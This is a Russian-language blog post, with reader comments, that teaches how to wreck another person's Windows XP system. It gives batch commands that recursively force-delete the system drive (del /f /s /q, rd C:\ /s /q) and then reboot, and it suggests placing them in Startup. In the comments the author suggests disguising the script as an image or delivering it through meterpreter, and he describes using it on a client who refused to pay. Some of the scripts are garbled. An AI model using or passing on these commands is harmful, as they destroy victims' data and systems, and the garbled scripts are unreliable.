Как уничтожить Windows противника?

Как уничтожить Windows противника?

ВНИМАНИЕ.

Автор статьи снимает с себя всякую ответственность за неправомерное применение или распространение ниженаписанного. Информация предоставлена лишь для ознакомления. Используйте его на свой страх и риск. Попробуйте все способы, лучше – на виртуальной машине.

уничтожить Windows Очередной трюк с Блокнотом и скриптом для Windows XP. Хотя на этот раз трюком назвать это нельзя – это самый настоящий вирус по своему действию. Подобные зловреды в сети редко гуляют. Он приведёт систему противника к краху. Настойчиво рекомендую вам пробовать этот скрипт на виртуальной машине. Ещё лучше – не полениться и установить на вновь созданном разделе жёсткого диска свежую операционную систему. Дабы уничтожить Windows описанными способами.

Как уничтожить Windows . Вариант 1.

Суть кода. Он уничтожит системные файлы Windows и вызовет появление BSOD. Итак, пишем Вирус Смерти. Вот синтаксис скрипта:

@echo off

del %systemdrive%\*.*/f /s /q

shutdown –r –f –t 00

Сохраните этот файл под расширением .vbs в любом месте. Перед сохранением не закрывайте и переходите к следующему шагу. Замените в названии Текстовый документ на Все файлы (All files). Вирус запускается двойным щелчком или как обычно из папки Автозагрузки. После загрузки системы пользователь увидит синий экран смерти.

Также можно попробовать (вместо второй строчки) такую команду:

del /f /s /q "C:\*.*"

Некоторые файлы откажутся удаляться, так как они могут использоваться в данный момент системой. Удалим, что сможем. Строка примет вид:

rd C:\ /s /q

Как обычно для такой папки, скрипт работать не будет при запуске из Безопасного режима.

После определённых раздумий и изысканий статью решил продолжить. Вот ещё несколько скриптов, которые разнесут систему вашего недруга в пух и прах.

Как уничтожить Windows . Вариант 2.

Напишем bat файл. Как и во всех подобных случаях откроем Блокнот и введём такой код:

{ @Echo off
 Del C:\ *.* |y }

Сохраняем в нужном месте под любым именем, но с обязательным расширением .bat.  Для “работы” батника потребуется время. Результатом будет стирание данных на диске С. Для восстановления затёртых данных придётся прибегать к услугам специализированного программного обеспечения или обращаться к обученным бойцам. В любом случае это потраченные время и нервы. Порой немалые деньги.

Пока всё. Используйте правильно.

Откройте для себя ещё больше трюков на сайте Компьютер76

Успехов.

4 ответа к «Как уничтожить Windows противника?»

    1. На ХР работал безотказно. Для убийства всех версий есть другая статья. Батник затирает файлы: либо все либо жизненные. Показано на примере, опять же, Windows XP.

  1. Как отправить такой файл на другой пк, к примеру в автозагрузку или планировщик?

    1. Способов немало (мы ведь говорим не про локальную сеть?), но они потребуют специфичной подготовки. Во-первых, есть вариант замаскировать деструктив под рисунок (или ещё что-то), при открытии которого запустится одновременно и тело деструктива. Во-вторых, при наличии навыков по работе с Кали Линукс воспользоваться одной из бесчисленных дыр в безопасности и открыть сессию метерпретера и подгружать на машину жертвы всё что угодно. У меня это есть в блоге. Или будет точно.
      Самый действенный способ, конечно – физический доступ к компьютеру (я нечто подобное делал, когда заказчик увиливал от оплаты за проделанную работу).
      Дело в том, что прописать батник в автозагрузку или запуститься из планировщика по некоему триггеру проблематично – впоследствии всё равно сработает UAC Windows. К тому же, это сильно утяжеляет сам файл и сделает его видимым некоторым антивирам. По крайней мере, насколько это мне известно.

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *

Максимальный размер загружаемого файла: 50 МБ. Вы можете загрузить: изображение, видео. Ссылки на YouTube, Facebook, Twitter и другие сервисы, вставленные в текст комментария, будут автоматически встроены. Перетащите файлы сюда